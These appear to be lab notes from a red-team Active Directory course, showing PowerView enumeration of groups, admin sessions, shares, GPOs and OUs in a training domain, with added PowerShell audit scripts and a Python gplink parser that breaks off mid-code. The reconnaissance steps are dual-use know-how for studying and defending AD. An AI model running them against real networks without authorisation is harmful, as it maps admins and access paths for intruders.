Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy

Getting the members of the groups


PS C:\Users\student163> Get-DomainGroupMember -Identity "Domain Admins"

GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberDomain : dollarcorp.moneycorp.local
MemberName : svcadmin
MemberDistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-719815819-3726368948-3917688648-1118

GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberDomain : dollarcorp.moneycorp.local
MemberName : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-719815819-3726368948-3917688648-500
PS C:\Users\student163> Get-DomainGroupMember -Identity "Domain Admins" -Recurse

GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberDomain : dollarcorp.moneycorp.local
MemberName : svcadmin
MemberDistinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-719815819-3726368948-3917688648-1118

GroupDomain : dollarcorp.moneycorp.local
GroupName : Domain Admins
GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberDomain : dollarcorp.moneycorp.local
MemberName : Administrator
MemberDistinguishedName : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
MemberObjectClass : user
MemberSID : S-1-5-21-719815819-3726368948-3917688648-500
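Both the AD module (Get-ADGroupMember -Recursive) and PowerView (Get-DomainGroupMember -Recurse) sections above show recursive membership for one group. The following added example, not part of the CRTP notes, applies the same comparison to a list of privileged groups with the ActiveDirectory module and reports which principals are effective members only through a nested group, which is the membership that is easiest to overlook in a review. The group list is an assumption; extend it to fit the environment.

```powershell
# Added example (not from the CRTP notes): audit privileged groups for nested membership
# using the ActiveDirectory module.
Import-Module ActiveDirectory

# Assumed list of groups worth reviewing; add environment-specific ones (e.g. RDP Users).
$privilegedGroups = @('Domain Admins', 'Administrators', 'Account Operators',
                      'Server Operators', 'Backup Operators', 'DnsAdmins')

foreach ($name in $privilegedGroups) {
    try {
        $group     = Get-ADGroup -Identity $name -ErrorAction Stop
        $direct    = @(Get-ADGroupMember -Identity $group -ErrorAction Stop)
        $effective = @(Get-ADGroupMember -Identity $group -Recursive -ErrorAction Stop)
    } catch {
        # -Recursive can fail on groups that hold foreign security principals, e.g. a
        # Builtin group containing a parent-domain group; report it and keep auditing.
        Write-Warning "Skipping ${name}: $_"
        continue
    }

    # Groups listed directly inside the privileged group.
    $nestedGroups = $direct | Where-Object objectClass -eq 'group'

    # Principals that appear only in the recursive result, i.e. inherited membership.
    $inheritedOnly = $effective |
        Where-Object { $_.distinguishedName -notin $direct.distinguishedName }

    [pscustomobject]@{
        Group            = $group.Name
        DirectMembers    = $direct.Count
        EffectiveMembers = $effective.Count
        NestedGroups     = ($nestedGroups.Name -join ', ')
        InheritedOnly    = ($inheritedOnly.SamAccountName -join ', ')
    }
}
```

A non-empty InheritedOnly column is the finding to chase: each such account has the group's rights without appearing in the group's direct member list that most administrators look at.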

Getting the local groups on a machine

This requires administrative privileges on the target when it is not a domain controller.


PS C:\Users\student163> Get-NetLocalGroup -ComputerName dcorp-dc.dollarcorp.moneycorp.local

ComputerName GroupName Comment
------------ --------- -------
dcorp-dc.dollarcorp.moneycorp.local Guests Guests have the same access as members o...
dcorp-dc.dollarcorp.moneycorp.local Print Operators Members can administer printers installe...
dcorp-dc.dollarcorp.moneycorp.local Backup Operators Backup Operators can override security r...
dcorp-dc.dollarcorp.moneycorp.local Replicator Supports file replication in a domain
dcorp-dc.dollarcorp.moneycorp.local Remote Desktop Users Members in this group are granted the ri...
dcorp-dc.dollarcorp.moneycorp.local Network Configuration Operators Members in this group can have some admi...
dcorp-dc.dollarcorp.moneycorp.local Performance Monitor Users Members of this group can access perform...
dcorp-dc.dollarcorp.moneycorp.local Performance Log Users Members of this group may schedule loggi...
dcorp-dc.dollarcorp.moneycorp.local Distributed COM Users Members are allowed to launch, activate ...
dcorp-dc.dollarcorp.moneycorp.local IIS_IUSRS Built-in group used by Internet Informat...
dcorp-dc.dollarcorp.moneycorp.local Cryptographic Operators Members are authorized to perform crypto...
dcorp-dc.dollarcorp.moneycorp.local Event Log Readers Members of this group can read event log...
dcorp-dc.dollarcorp.moneycorp.local Certificate Service DCOM Access Members of this group are allowed to con...
dcorp-dc.dollarcorp.moneycorp.local RDS Remote Access Servers Servers in this group enable users of Re...
dcorp-dc.dollarcorp.moneycorp.local RDS Endpoint Servers Servers in this group run virtual machin...
dcorp-dc.dollarcorp.moneycorp.local RDS Management Servers Servers in this group can perform routin...
dcorp-dc.dollarcorp.moneycorp.local Hyper-V Administrators Members of this group have complete and ...
dcorp-dc.dollarcorp.moneycorp.local Access Control Assistance Operators Members of this group can remotely query...
dcorp-dc.dollarcorp.moneycorp.local Remote Management Users Members of this group can access WMI res...
dcorp-dc.dollarcorp.moneycorp.local Storage Replica Administrators Members of this group have complete and ...
dcorp-dc.dollarcorp.moneycorp.local Server Operators Members can administer domain servers
dcorp-dc.dollarcorp.moneycorp.local Account Operators Members can administer domain user and g...
dcorp-dc.dollarcorp.moneycorp.local Pre-Windows 2000 Compatible Access A backward compatibility group which all...
dcorp-dc.dollarcorp.moneycorp.local Windows Authorization Access Group Members of this group have access to the...
dcorp-dc.dollarcorp.moneycorp.local Terminal Server License Servers Members of this group can update user ac...
dcorp-dc.dollarcorp.moneycorp.local Administrators Administrators have complete and unrestr...
dcorp-dc.dollarcorp.moneycorp.local Users Users are prevented from making accident...
dcorp-dc.dollarcorp.moneycorp.local Cert Publishers Members of this group are permitted to p...
dcorp-dc.dollarcorp.moneycorp.local RAS and IAS Servers Servers in this group can access remote ...
dcorp-dc.dollarcorp.moneycorp.local Allowed RODC Password Replication Group Members in this group can have their pas...
dcorp-dc.dollarcorp.moneycorp.local Denied RODC Password Replication Group Members in this group cannot have their ...
dcorp-dc.dollarcorp.moneycorp.local DnsAdmins DNS Administrators Group

Getting members of local group "Administrators" on a machine

This requires administrative privileges on the target when it is not a domain controller.


PS C:\Users\student163> Get-NetLocalGroupMember -ComputerName dcorp-dc.dollarcorp.moneycorp.local

ComputerName : dcorp-dc.dollarcorp.moneycorp.local
GroupName : Administrators
MemberName : dcorp\Administrator
SID : S-1-5-21-719815819-3726368948-3917688648-500
IsGroup : False
IsDomain : False

ComputerName : dcorp-dc.dollarcorp.moneycorp.local
GroupName : Administrators
MemberName : dcorp\Domain Admins
SID : S-1-5-21-719815819-3726368948-3917688648-512
IsGroup : True
IsDomain : False

ComputerName : dcorp-dc.dollarcorp.moneycorp.local
GroupName : Administrators
MemberName : mcorp\Enterprise Admins
SID : S-1-5-21-335606122-960912869-3279953914-519
IsGroup : True
IsDomain : True

Sessions Enumeration
Using Powerview
Getting the actively logged on users on a computer

This requires administrative privileges on the target


PS C:\Users\student163> Get-NetLoggedon -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : srvadmin
LogonDomain : dcorp
AuthDomains :
LogonServer : DCORP-DC
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : DCORP-ADMINSRV$
LogonDomain : dcorp
AuthDomains :
LogonServer :
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : websvc
LogonDomain : dcorp
AuthDomains :
LogonServer : DCORP-DC
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : appadmin
LogonDomain : dcorp
AuthDomains :
LogonServer : DCORP-DC
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : DCORP-ADMINSRV$
LogonDomain : dcorp
AuthDomains :
LogonServer :
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : DCORP-ADMINSRV$
LogonDomain : dcorp
AuthDomains :
LogonServer :
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

UserName : DCORP-ADMINSRV$
LogonDomain : dcorp
AuthDomains :
LogonServer :
ComputerName : dcorp-adminsrv.dollarcorp.moneycorp.local

Getting the locally logged on users on a computer

This requires the Remote Registry service to be running on the target. By default, this service runs on server operating systems but is disabled on client operating systems.
PS C:\Users\student163> Get-LoggedOnLocal -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

Getting the last logged on user on the computer

This requires both administrative privileges on the target and the Remote Registry service running on it.
PS C:\Users\student163> Get-LastLoggedOn -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

ComputerName LastLoggedOn
------------ ------------
dcorp-adminsrv.dollarcorp.moneycorp.local .\Administrator
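The session output above shows srvadmin and appadmin logged on to dcorp-adminsrv; the question a defender asks of such data is whether any of those sessions belong to a member of Domain Admins on a machine that is not a domain controller, because that is a tiering violation that exposes the most valuable credentials. The following added example, not part of the CRTP notes, automates that check with PowerView (Get-DomainGroupMember, Get-DomainController, Get-DomainComputer and Get-NetLoggedon). Like Get-NetLoggedon itself it needs administrative rights on each target, so hosts that cannot be queried are simply skipped.

```powershell
# Added example (not from the CRTP notes): report Domain Admins with active sessions on
# machines other than domain controllers, using PowerView functions shown in this section.
$privileged = Get-DomainGroupMember -Identity 'Domain Admins' -Recurse |
    Where-Object MemberObjectClass -eq 'user' |
    Select-Object -ExpandProperty MemberName

# Domain controllers are the one place these accounts are expected to log on.
$dcNames = Get-DomainController | Select-Object -ExpandProperty Name
$targets = Get-DomainComputer -Properties dnshostname |
    Select-Object -ExpandProperty dnshostname |
    Where-Object { $_ -and ($_ -notin $dcNames) }

$exposures = foreach ($computer in $targets) {
    $sessions = Get-NetLoggedon -ComputerName $computer -ErrorAction SilentlyContinue
    if (-not $sessions) { continue }   # unreachable, or no admin rights on this host

    $sessions |
        Where-Object { $_.UserName -notlike '*$' -and $_.UserName -in $privileged } |
        ForEach-Object {
            [pscustomobject]@{
                Computer    = $computer
                User        = "$($_.LogonDomain)\$($_.UserName)"
                LogonServer = $_.LogonServer
            }
        }
}

# One row per (user, computer) pair; machine accounts (names ending in $) were excluded above.
$exposures | Sort-Object User, Computer -Unique | Format-Table -AutoSize
```

Any row in the result is worth a ticket: either the logon should not happen on that tier, or the host should be treated as a Tier 0 asset and protected accordingly.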

Shares Enumeration
Using Powerview
Getting shares on the hosts in the current domain
PS C:\Users\student163> Invoke-Sharefinder -Verbose
VERBOSE: [Find-DomainShare] Querying computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed because [System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-DomainShare] TargetComputers length: 28
VERBOSE: [Find-DomainShare] Using threading with threads: 20
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
Name Type Remark ComputerName
Name Type Remark ComputerName

Name Type Remark ComputerName


VERBOSE: [New-ThreadedFunction] Threads executing

Name Type Remark ComputerName


---- ---- ------ ------------
ADMIN$ 2147483648 Remote Admin dcorp-std170.dollarcorp.moneycorp.local
C$ 2147483648 Default share dcorp-std170.dollarcorp.moneycorp.local
IPC$ 2147483651 Remote IPC dcorp-std170.dollarcorp.moneycorp.local
shared 0 dcorp-std170.dollarcorp.moneycorp.local
Users 0 dcorp-std170.dollarcorp.moneycorp.local
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed

Getting File servers


PS C:\Users\student163> Get-NetFileServer
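The Invoke-ShareFinder output above lists every share, including the administrative defaults (ADMIN$, C$, IPC$) that exist on every Windows host. The following added example, not part of the CRTP notes, narrows the same data to what a defender actually wants to review: non-default shares that the current, unprivileged domain user can read, grouped by host. It uses PowerView's Find-DomainShare, the function the VERBOSE lines show Invoke-ShareFinder resolving to, with its -CheckShareAccess switch; the list of share names treated as default is an assumption.

```powershell
# Added example (not from the CRTP notes): inventory readable, non-default SMB shares
# across the domain with PowerView's Find-DomainShare.

# Assumed list of shares to ignore: administrative defaults plus the DC replication shares.
$defaultShares = '^(ADMIN\$|C\$|D\$|IPC\$|print\$|NETLOGON|SYSVOL)$'

# -CheckShareAccess keeps only shares the current user can read.
$exposed = Find-DomainShare -CheckShareAccess |
    Where-Object { $_.Name -notmatch $defaultShares } |
    Select-Object ComputerName, Name, Remark

$exposed | Sort-Object ComputerName, Name | Format-Table -AutoSize

# One line per host, busiest first, to prioritise the review.
$exposed | Group-Object ComputerName |
    Sort-Object Count -Descending |
    Select-Object @{ n = 'ComputerName'; e = { $_.Name } },
                  Count,
                  @{ n = 'Shares'; e = { $_.Group.Name -join ', ' } }
```

Run it as an ordinary domain account rather than an administrator: the point is to see what every authenticated user can read, and an admin token would overstate that.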

GPO Enumeration
Using PowerView
Get List of GPOs in the current domain
PS C:\Users\student163> Get-DomainGPO

flags : 0
systemflags : -1946157056
displayname : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 11/12/2022 6:07:26 AM
versionnumber : 3
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
usnchanged : 12893
dscorepropagationdata : {11/12/2022 5:59:41 AM, 1/1/1601 12:00:00 AM}
objectguid : 7fd00875-441d-44d8-a325-19bee9b8800d
iscriticalsystemobject : True
gpcfilesyspath : \\dollarcorp.moneycorp.local\sysvol\dollarcorp.moneycorp.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
whencreated : 11/12/2022 5:59:00 AM
showinadvancedviewonly : True
usncreated : 7789
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

flags : 0
systemflags : -1946157056
displayname : Default Domain Controllers Policy
gpcmachineextensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 11/12/2022 5:59:00 AM
versionnumber : 1
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
usnchanged : 7792
dscorepropagationdata : {11/12/2022 5:59:41 AM, 1/1/1601 12:00:00 AM}
objectguid : ac098e0e-a9a2-46e1-828d-b08c9ac75593
iscriticalsystemobject : True
gpcfilesyspath : \\dollarcorp.moneycorp.local\sysvol\dollarcorp.moneycorp.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
whencreated : 11/12/2022 5:59:00 AM
showinadvancedviewonly : True
usncreated : 7792
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

flags : 0
displayname : Applocker
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{62C1845D-C4A6-4ACB-BBB0-
C895FD090385}{D02B1F72-3407-
48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-
00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0
C90F574B}]
whenchanged : 11/15/2022 5:50:16 AM
versionnumber : 15
name : {0D1CC23D-1F20-4EEE-AF64-D99597AE2A6E}
cn : {0D1CC23D-1F20-4EEE-AF64-D99597AE2A6E}
usnchanged : 45979
dscorepropagationdata : 1/1/1601 12:00:00 AM
objectguid : bcf4770b-b560-468b-88cb-6beaeb6793f9
gpcfilesyspath :
\\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{0D1CC23D-1F20-4EEE-
AF64-D99597AE2A6E}
distinguishedname : CN={0D1CC23D-1F20-4EEE-AF64-
D99597AE2A6E},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,D
C=local
whencreated : 11/15/2022 4:21:20 AM
showinadvancedviewonly : True
usncreated : 45231
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

flags : 0
displayname : Servers
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-
E8213C6761F1}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 11/15/2022 5:49:33 AM
versionnumber : 6
name : {308279C1-FFB6-4D52-948C-660B07AC77FB}
cn : {308279C1-FFB6-4D52-948C-660B07AC77FB}
usnchanged : 45969
dscorepropagationdata : 1/1/1601 12:00:00 AM
objectguid : 5e0b30e9-2965-4566-b89d-a34c7167446c
gpcfilesyspath :
\\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{308279C1-FFB6-4D52-
948C-660B07AC77FB}
distinguishedname : CN={308279C1-FFB6-4D52-948C-
660B07AC77FB},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,D
C=local
whencreated : 11/15/2022 5:45:09 AM
showinadvancedviewonly : True
usncreated : 45910
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

flags : 0
displayname : Students
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-
E8213C6761F1}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 11/15/2022 5:48:32 AM
versionnumber : 6
name : {7478F170-6A0C-490C-B355-9E4618BC785D}
cn : {7478F170-6A0C-490C-B355-9E4618BC785D}
usnchanged : 45959
dscorepropagationdata : 1/1/1601 12:00:00 AM
objectguid : 0076f619-ffef-4488-bfdb-1fc028c5cb14
gpcfilesyspath :
\\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{7478F170-6A0C-490C-
B355-9E4618BC785D}
distinguishedname : CN={7478F170-6A0C-490C-B355-
9E4618BC785D},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,D
C=local
whencreated : 11/15/2022 5:46:19 AM
showinadvancedviewonly : True
usncreated : 45927
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-
Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

Getting the list of GPOs applied on a computer


PS C:\Users\student163> Get-DomainGPO -ComputerIdentity dcorp-std163
Exception calling "FindAll" with "0" argument(s): "There is no such object on the server."
At C:\Ad\Tools\PowerView.ps1:10201 char:20
+ else { $Results = $SiteSearcher.FindAll() }
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : DirectoryServicesCOMException

flags : 0
displayname : Students
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 11/15/2022 5:48:32 AM
versionnumber : 6
name : {7478F170-6A0C-490C-B355-9E4618BC785D}
cn : {7478F170-6A0C-490C-B355-9E4618BC785D}
usnchanged : 45959
dscorepropagationdata : 1/1/1601 12:00:00 AM
objectguid : 0076f619-ffef-4488-bfdb-1fc028c5cb14
gpcfilesyspath : \\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{7478F170-6A0C-490C-B355-9E4618BC785D}
distinguishedname : CN={7478F170-6A0C-490C-B355-9E4618BC785D},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
whencreated : 11/15/2022 5:46:19 AM
showinadvancedviewonly : True
usncreated : 45927
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

flags : 0
systemflags : -1946157056
displayname : Default Domain Policy
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 11/12/2022 6:07:26 AM
versionnumber : 3
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
usnchanged : 12893
dscorepropagationdata : {11/12/2022 5:59:41 AM, 1/1/1601 12:00:00 AM}
objectguid : 7fd00875-441d-44d8-a325-19bee9b8800d
iscriticalsystemobject : True
gpcfilesyspath : \\dollarcorp.moneycorp.local\sysvol\dollarcorp.moneycorp.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
whencreated : 11/12/2022 5:59:00 AM
showinadvancedviewonly : True
usncreated : 7789
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local


Getting GPO(s) which use Restricted Groups or groups.xml for interesting users


PS C:\Users\student163> Get-DomainGPOLocalGroup

Getting users who are in a local group on a machine using GPO


PS C:\Users\student163> Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity dcorp-dc.dollarcorp.moneycorp.local

Getting Organizational Units in a domain


PS C:\Users\student163> Get-DomainOU

description : Default container for domain controllers
systemflags : -1946157056
iscriticalsystemobject : True
gplink : [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local;0]
whenchanged : 11/12/2022 5:59:00 AM
objectclass : {top, organizationalUnit}
showinadvancedviewonly : False
usnchanged : 7921
dscorepropagationdata : {11/15/2022 3:49:24 AM, 11/12/2022 5:59:41 AM, 1/1/1601 12:04:16 AM}
name : Domain Controllers
distinguishedname : OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=local
ou : Domain Controllers
usncreated : 7921
whencreated : 11/12/2022 5:59:00 AM
instancetype : 4
objectguid : 802da67f-f1f8-40a7-9d13-7e76ccb25e39
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

usncreated : 44996
displayname : StudentMachines
gplink : [LDAP://cn={7478F170-6A0C-490C-B355-9E4618BC785D},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]
whenchanged : 11/15/2022 5:46:19 AM
objectclass : {top, organizationalUnit}
usnchanged : 45933
dscorepropagationdata : {11/15/2022 3:49:24 AM, 11/15/2022 3:49:24 AM, 1/1/1601 12:00:00 AM}
name : StudentMachines
distinguishedname : OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
ou : StudentMachines
whencreated : 11/15/2022 3:49:24 AM
instancetype : 4
objectguid : 1c7cd8cb-d8bb-412f-9d76-9cff8afa021f
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

usncreated : 45190
name : Applocked
gplink : [LDAP://cn={0D1CC23D-1F20-4EEE-AF64-D99597AE2A6E},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]
whenchanged : 11/15/2022 4:21:20 AM
objectclass : {top, organizationalUnit}
usnchanged : 45237
dscorepropagationdata : {11/15/2022 4:16:38 AM, 1/1/1601 12:00:00 AM}
distinguishedname : OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
ou : Applocked
whencreated : 11/15/2022 4:16:38 AM
instancetype : 4
objectguid : e33cfcdb-8c09-4a51-a0bf-c67815e72615
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

usncreated : 45196
name : Servers
gplink : [LDAP://cn={308279C1-FFB6-4D52-948C-660B07AC77FB},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]
whenchanged : 11/15/2022 5:45:10 AM
objectclass : {top, organizationalUnit}
usnchanged : 45916
dscorepropagationdata : {11/15/2022 4:17:04 AM, 1/1/1601 12:00:00 AM}
distinguishedname : OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
ou : Servers
whencreated : 11/15/2022 4:17:04 AM
instancetype : 4
objectguid : f49a5fa1-0296-4e75-9c2d-c68c3b872d15
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

Getting the details of the GPO applied on an OU

We need to get the details of the GPO applied on an OU. First list the OUs with Get-DomainOU; from the gplink
attribute of the OU we obtain the unique ID (GUID) of the linked GPO, and then we pass that ID to the
Get-DomainGPO cmdlet to get the name of the GPO.
PS C:\Users\student163> Get-DomainOU

usncreated : 45196
name : Servers
gplink : [LDAP://cn={308279C1-FFB6-4D52-948C-660B07AC77FB},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]
whenchanged : 11/15/2022 5:45:10 AM
objectclass : {top, organizationalUnit}
usnchanged : 45916
dscorepropagationdata : {11/15/2022 4:17:04 AM, 1/1/1601 12:00:00 AM}
distinguishedname : OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
ou : Servers
whencreated : 11/15/2022 4:17:04 AM
instancetype : 4
objectguid : f49a5fa1-0296-4e75-9c2d-c68c3b872d15
objectcategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

PS C:\Users\student163> Get-DomainGPO -Name '{308279C1-FFB6-4D52-948C-660B07AC77FB}'

flags : 0
displayname : Servers
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 11/15/2022 5:49:33 AM
versionnumber : 6
name : {308279C1-FFB6-4D52-948C-660B07AC77FB}
cn : {308279C1-FFB6-4D52-948C-660B07AC77FB}
usnchanged : 45969
dscorepropagationdata : 1/1/1601 12:00:00 AM
objectguid : 5e0b30e9-2965-4566-b89d-a34c7167446c
gpcfilesyspath : \\dollarcorp.moneycorp.local\SysVol\dollarcorp.moneycorp.local\Policies\{308279C1-FFB6-4D52-948C-660B07AC77FB}
distinguishedname : CN={308279C1-FFB6-4D52-948C-660B07AC77FB},CN=Policies,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
whencreated : 11/15/2022 5:45:09 AM
showinadvancedviewonly : True
usncreated : 45910
gpcfunctionalityversion : 2
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
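
The gplink-to-GPO mapping above can also be done offline on the saved enumeration output. The following Python is an added example (not from the course notes and not part of PowerView): it parses gplink strings copied from the Get-DomainOU output above into the linked GPO GUIDs and their link options, and resolves each GUID against a name table built from the Get-DomainGPO output. The OU=Example entry, its enforced link and the all-zero GUID are constructed to show a link to a GPO that no longer exists.

```python
"""Parse gplink values from Get-DomainOU output into the GPOs linked to an OU.

Added example, not part of the course notes or of PowerView. Input strings are
copied from the OU output above; the GUID-to-displayname table is built from
the Get-DomainGPO output above. gplink is a concatenation of
"[LDAP://<GPO DN>;<options>]" entries where options bit 1 means the link is
disabled and bit 2 means it is enforced, so no directory access is needed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# One link: "[LDAP://<dn>;<options>]"; entries are simply concatenated.
GPLINK_RE = re.compile(r"\[LDAP://([^;\]]+);(\d+)\]", re.IGNORECASE)
# The GPO name/cn is the GUID in braces at the start of the DN.
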